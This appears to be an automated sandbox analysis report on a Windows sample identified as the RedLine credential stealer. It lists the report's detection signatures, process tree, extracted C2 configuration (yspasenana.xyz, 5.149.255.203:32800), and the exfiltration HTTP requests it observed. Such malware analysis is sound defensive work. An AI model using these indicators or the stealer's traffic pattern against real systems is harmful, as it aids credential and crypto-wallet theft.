Loading ...

Play interactive tourEdit tour

Windows Analysis Report Nb2HQZZDIf

Overview

General Information

Sample Name:Nb2HQZZDIf (renamed file extension from none to exe)
Analysis ID:452456
MD5:b8371590264db62ecbba4b7f481a21a8
SHA1:837bfd10d70113330b2e00a1f12e99c4b0065d38
SHA256:fa3e22734ccb01da24364b65793ca5d2fafc53fbe6cef3eab8d76b158d1e0d7a
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected RedLine Stealer
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code contains very large strings
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
May check the online IP address of the machine
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to a URL shortener service
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Nb2HQZZDIf.exe (PID: 5924 cmdline: 'C:\Users\user\Desktop\Nb2HQZZDIf.exe' MD5: B8371590264DB62ECBBA4B7F481A21A8)
    • 1234.exe (PID: 4628 cmdline: C:\Users\user\AppData\Roaming\1234.exe 1234 MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
      • 1234.exe (PID: 808 cmdline: {path} MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
      • 1234.exe (PID: 2524 cmdline: {path} MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
        • srvs.exe (PID: 5088 cmdline: 'C:\Users\user\AppData\Local\Temp\srvs.exe' MD5: D11C21AB3E969F79E3C783FDD97E1C10)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000015.00000003.382545912.0000000000D10000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
            00000002.00000002.306824778.00000000042C0000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.1234.exe.43e5a60.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                15.2.1234.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  2.2.1234.exe.43e5a60.3.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    21.2.srvs.exe.df0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 2.2.1234.exe.43e5a60.3.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeMetadefender: Detection: 17%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeReversingLabs: Detection: 35%
                      Source: C:\Users\user\AppData\Roaming\1234.exeReversingLabs: Detection: 33%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Nb2HQZZDIf.exeVirustotal: Detection: 22%Perma Link
                      Source: Nb2HQZZDIf.exeReversingLabs: Detection: 25%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeJoe Sandbox ML: detected
                      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.25.233.53:443 -> 192.168.2.3:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.216.94.27:443 -> 192.168.2.3:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.217.80.20:443 -> 192.168.2.3:49747 version: TLS 1.2
                      Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: srvs.exe, 00000015.00000002.480413638.0000000001182000.00000040.00020000.sdmp
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C2390 FindFirstFileW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D792 FindFirstFileW,GetLastError,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,

                      Networking:

                      barindex
                      May check the online IP address of the machineShow sources
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeDNS query: name: iplogger.org
                      Performs DNS queries to domains with low reputationShow sources
                      Source: C:\Users\user\AppData\Roaming\1234.exeDNS query: yspasenana.xyz
                      Source: C:\Users\user\AppData\Roaming\1234.exeDNS query: yspasenana.xyz
                      Source: C:\Users\user\AppData\Roaming\1234.exeDNS query: yspasenana.xyz
                      Source: C:\Users\user\AppData\Roaming\1234.exeDNS query: yspasenana.xyz
                      Uses known network protocols on non-standard portsShow sources
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 32800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 32800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 32800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49754
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeDNS query: name: is.gd
                      Source: global trafficTCP traffic: 192.168.2.3:49751 -> 5.149.255.203:32800
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: yspasenana.xyzContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: yspasenana.xyzContent-Length: 1151249Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: yspasenana.xyzContent-Length: 1151241Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: yspasenana.xyzContent-Length: 1151267Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 5.149.255.203:32800Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 5.149.255.203:32800Content-Length: 1151929Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 5.149.255.203:32800Content-Length: 1151921Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 104.25.233.53 104.25.233.53
                      Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.149.255.203
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
                      Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                      Source: unknownDNS traffic detected: queries for: iplogger.org
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: yspasenana.xyzContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: srvs.exe, 00000015.00000002.484619436.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://5.149.255.203:3
                      Source: srvs.exe, 00000015.00000002.484570685.0000000003975000.00000004.00000001.sdmpString found in binary or memory: http://5.149.255.203:32800
                      Source: srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://5.149.255.203:32800/
                      Source: srvs.exe, 00000015.00000002.484570685.0000000003975000.00000004.00000001.sdmpString found in binary or memory: http://5.149.255.203:328004
                      Source: Nb2HQZZDIf.exe, Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmpString found in binary or memory: http://ahkscript.org
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmpString found in binary or memory: http://ahkscript.orgCould
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://bitbucket.org
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.385284106.0000000002B0B000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: Nb2HQZZDIf.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, Nb2HQZZDIf.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.385284106.0000000002B0B000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
                      Source: 1234.exe, 0000000F.00000002.385284106.0000000002B0B000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCert
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0K
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
                      Source: Nb2HQZZDIf.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.306921781.0000000000968000.00000004.00000020.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, Nb2HQZZDIf.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
